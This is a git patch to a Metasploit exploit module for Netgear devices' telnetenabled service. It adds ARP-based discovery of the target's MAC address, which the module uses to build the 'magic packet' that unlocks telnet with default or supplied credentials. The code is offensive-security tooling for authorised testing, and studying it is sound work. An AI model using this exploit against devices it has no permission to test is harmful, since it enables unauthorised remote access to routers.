From 6dbf9445c9578d559a1faaf4977f5687461ff1e1 Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 2 Mar 2018 19:02:44 -0600 Subject: [PATCH] Add MAC address discovery --- .../linux/telnet/netgear_telnetenable.rb | 31 +++++++++++++++++-- 1 file changed, 29 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/telnet/netgear_telnetenable.rb b/modules/exploits/linux/telnet/netgear_telnetenable.rb index fe0afe3498..99fb159296 100644 --- a/modules/exploits/linux/telnet/netgear_telnetenable.rb +++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Capture def initialize(info = {}) super(update_info(info, @@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options([ Opt::RPORT(23), - OptString.new('MAC', [true, 'MAC address of device']), + OptString.new('MAC', [false, 'MAC address of device']), OptString.new('USERNAME', [false, 'Username on device']), OptString.new('PASSWORD', [false, 'Password on device']) ]) @@ -84,6 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote @proto = target[:proto] detect_proto if @proto == :auto + # Use supplied or ARP-cached MAC address + configure_mac if @do_exploit + # Use supplied or default creds configure_creds if @do_exploit @@ -120,6 +124,29 @@ class MetasploitModule < Msf::Exploit::Remote end end + def configure_mac + @mac = datastore['MAC'] + + return if @mac + + print_status('Attempting to discover MAC address via ARP') + + begin + open_pcap + @mac = lookup_eth(rhost).first + rescue RuntimeError + fail_with(Failure::BadConfig, 'Superuser access required') + ensure + close_pcap + end + + if @mac + print_good("Found MAC address #{@mac}") + else + fail_with(Failure::Unknown, 'Could not find MAC address') + end + end + def configure_creds @username = datastore['USERNAME'] || target[:username] @password = datastore['PASSWORD'] || target[:password] @@ -136,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit_telnetenabled print_status('Generating magic packet') - payload = magic_packet(datastore['MAC'], @username, @password) + payload = magic_packet(@mac, @username, @password) begin print_status("Connecting to telnetenabled via #{@proto.upcase}")